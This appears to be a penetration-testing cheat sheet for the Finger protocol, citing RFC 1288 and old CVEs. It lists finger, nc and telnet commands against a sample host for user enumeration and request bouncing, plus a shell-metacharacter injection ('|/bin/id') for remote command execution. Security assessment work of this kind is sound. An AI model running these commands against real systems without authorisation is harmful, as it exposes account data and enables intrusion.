Finger (User Information Protocol) #

At a Glance #

Default Port: 79

The Finger User Information Protocol (RFC 1288), is a simple protocol that provides an interface to a remote user information program (RUIP). ¹

telnet 10.0.0.3 79

echo "root" | nc -n 10.0.0.3 79

for q in 'root' 'admin' 'user' '0' "'a b c d e f g h'" '|/bin/id';do echo "FINGER: $q"; finger "$q@10.0.0.3"; echo -e "\n";done

List logged users.

finger @10.0.0.3

Finger a specific user.

finger -l root@10.0.0.3

Enumerate users containing user.

finger -l user@10.0.0.3

Note: Try other words as: admin, account or project.

Parameters

fingerd may respond to finger 0@<host> with information on some user accounts.

finger 0@10.0.0.3

fingerd may respond to 'a b c d e f g h'@<host> with information on all accounts.

finger 'a b c d e f g h'@10.0.0.3

finger can be used to relay a request to a different host as if it were sent from that machine.

finger @10.0.0.3@10.10.10.4

finger root@10.0.0.3@10.10.10.4

fingerd allows remote command execution through shell metacharacters.

finger "|/bin/id@10.0.0.3"

“RFC 1288 - The Finger User Information Protocol.” IETF Tools, https://tools.ietf.org/html/rfc1288. ↩︎
“Finger(1): User Info Lookup Program.” Linux Documentation, https://linux.die.net/man/1/finger. ↩︎
“CVE - CVE-1999-0197.” CVE - Common Vulnerabilities and Exposures (CVE), https://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0197. ↩︎
“CVE - CVE-2001-1503.” CVE - Common Vulnerabilities and Exposures (CVE), https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1503. ↩︎
“‘Solaris 2.7 Allows Finger Bouncing’ .” SecuriTeam, 15 Jan. 1999, https://securiteam.com/exploits/2BUQ2RFQ0I/. ↩︎
“CVE - CVE-1999-0152.” CVE - Common Vulnerabilities and Exposures (CVE), https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0152. ↩︎